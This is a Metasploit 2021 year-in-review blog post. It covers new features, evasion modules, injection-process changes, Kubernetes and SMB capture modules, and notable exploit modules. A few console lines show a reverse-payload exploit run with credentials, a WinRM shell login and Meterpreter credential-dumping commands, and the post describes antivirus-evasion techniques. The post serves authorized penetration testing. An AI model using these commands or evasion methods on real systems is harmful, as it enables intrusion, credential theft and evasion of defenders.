Metasploit 2021 Annual Wrap-Up

Last updated at Thu, 30 Nov 2023 19:44:37 GMT

As 2022 kicks off, we now have another year in the books. Like years past, 2021 brought some surprises and had its share of celebrity vulnerabilities and recurring trends. Let’s highlight some statistics!

Quick stats

• 651 merged pull requests from 113 users
• 184 new modules
  • 102 exploits, 45 post, 32 auxiliary, 3 payload, and 2 evasion
• 1 Metasploit Community CTF hosted
  • 1,501 users registered across 727 teams
  • 18 total challenges
  • 1,264 correct challenge submissions

URI support

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload
run postgres://administrator:pass@192.168.123.6 lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit's console — it will also make it easier to share cheat sheets among pentesters. Support includes HTTP, MySQL, PostgreSQL, SMB, SSH, and more; check out the full announcement post.

Sessions without payloads

AV evasion is a hard problem that’s not going to be solved in the foreseeable future. Payloads are caught in a variety of ways by a variety of AVs. One sustainable approach Metasploit is attempting to take is to enable users to leverage sessions that don’t require payload code to be running on the target. While not always a feasible solution, when it is, it can be quite reliable.

Earlier in 2021, community member smashery took on a large effort to enable Metasploit users to obtain interactive command shell sessions using Microsoft’s WinRM. The result is an improvement that enables the scanner/winrm/winrm_login module to open a command shell session without having uploaded a payload to the target. This session can then of course be used with post modules that are compatible with shell payloads.

msf6 auxiliary(scanner/winrm/winrm_login) > run username=Administrator password=pass rhost=192.168.123.15

[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.15:5985 - Login Successful: WORKSTATION\Administator:pass
[*] Command shell session 4 opened (192.168.123.1:50321 -> 192.168.123.15:5985 ) at 2021-12-17 14:14:25 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

In a similar vein, Metasploit has for a while now had the ability to open command shell sessions from the scanner/ssh/ssh_login module. These command shell sessions could also be used with post modules that didn’t require full Meterpreter sessions. However, one notable feature that SSH servers did not support until 2021 was the ability to port-forward over these connections. Last year saw improvements to Metasploit’s handling of SSH sessions that enable both standard port forwarding (for client connections) and reverse port forwarding (for server connections). Being fully wired into Metasploit, so to speak, means users can forward connections over them using the route command in the same way they can with Meterpreter sessions.

We hope these new capabilities provide users with more options to perform their testing from Metasploit while keeping payloads entirely out of memory.

Evasion modules

Evasion modules are one of Metasploit’s most infrequently added types, but they are certainly noteworthy when they are added. Last year saw two such modules added, both targeting Windows executables. The first module, based on Johnny Shaw’s work, implemented Process Herpaderping. This novel technique obfuscates the payload’s main logic from security products. This technique was effective for a few months but was ultimately added as a detection to Windows Defender.

Another evasion module added this year was kensh1ro’s syscall module. Using direct system calls is a popular technique to evade user-mode analysis hooks, and this module brings the capability to Metasploit, too.

RDLL exploit improvements

Last year, the post exploit library used by quite a few Windows local exploits saw a great improvement that reduced code reuse and laid the foundation to randomize the target process used to host the injected DLL. Prior to this, most exploits would start notepad using a piece of template code that would then load the RDLL and, when successful, execute the payload. This often led to the notepad process making network calls, which is pretty easily identified as malicious behavior. Instead, these modules will now randomly select a binary from a list and automatically start a process of the correct architecture. No more notepad instances making network calls from exploits. Currently, the new implementation will randomly select between msiexec and netsh, both of which are widely available across Windows versions and are less likely to be identified when making network connections.

Kubernetes support

It’s safe to say that cloud computing is here to stay. Metasploit added the first modules that target the Kubernetes platform. The first module is an auxiliary module that is capable of enumerating namespace, pod, and secret information. Following up on that is an exploit module that, when provided the necessary credentials, can execute a payload within a pod. In a similar vein to the previously mentioned payload-less post-exploitation capabilities, this module can also open a direct command shell session using a new, native WebSocket implementation. We hope these modules help Metasploit users who are testing these environments and look forward to expanding on the capabilities in 2022.

Session validation

Being a framework, Metasploit offers a variety of payloads and session types. Unfortunately, not every payload yields a session type with the same capabilities (e.g. the PHP Meterpreter does not offer Kiwi). This can be very confusing for users as they’re attempting to use various post modules and Meterpreter commands. Last year, Metasploit improved the way this is handled and now offers concise error messages when certain capabilities are missing or can’t be performed with a particular session type. Now running a Meterpreter command that’s either unsupported or provided by an extension that hasn’t been loaded will be reported as such.

meterpreter > creds_all
[-] The "creds_all" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/osx)
[-] The "kiwi" extension is supported by the following Meterpreter payloads:
[-]   - windows/x64/meterpreter*
[-]   - windows/meterpreter*

Improved SMB capture server

SMB1 has not been enabled by default in Windows 10 since 2017. Last year, Metasploit began the long process of updating the SMB server capabilities to work with the modern SMB 2 and SMB 3 versions. The first milestone allowed the capture server (auxiliary/server/capture/smb) that collects authentication information from incoming client connections to be upgraded to support incoming connections from SMB 2 and SMB 3 clients. Today, the capture server can be used with modern versions for Windows, in their default configuration.

New module highlights

• exploits/windows/http/exchange_proxylogon_rce – This was the first of two high-profile Exchange RCEs added to Metasploit and highlighted the need for administrators to stay on top of patching their on premises Exchange servers or migrate.
• exploit/multi/http/git_lfs_clone_command_exec – This exploit brought along with it new capabilities for Metasploit to act as a malicious Git server. This opens the door for future modules to exploit similar vulnerabilities.
• exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe eBPF has been a popular target for Linux LPEs this year. This particular exploit, based on @chompie1337’s original research was particularly valuable due to the number of platforms it affected as well as its reliability. Speaking of reliability…
• exploits/linux/local/sudo_baron_samedit – Being January 2022, this particular celebrity vulnerability seems like old news. At the time, however, it gained quite a bit of attention, as it was in the ever-prevalent sudo utility. One quality that made this exploit particularly valuable was that there is no risk of system instability while exploiting it. This will likely remain a go-to exploit for users needing to escalate on Linux systems in years to come.
  auxiliary/gather/windows_secrets_dump – While not technically a new module, this particular entry saw a massive improvement in its addition of support for targeting Domain Controllers. This was a monumental effort that included a foundation that also makes it easier for modules to run attacks over DCERPC (think PrintNightmare and ZeroLogon).
• exploit/multi/http/cve_2021_35464_forgerock_openam – Any unauthenticated RCE in an application that’s intended to be an IAM solution is worth calling out.
• post/windows/gather/credentials/windows_sam_hivenightmare – This was another highly reliable privilege escalation technique that could be used to recover sensitive files on Windows systems. The module’s implementation performs the entire operation in memory using Meterpreter with spawning new processes or dropping artifacts to disk, making it a very stealthy approach.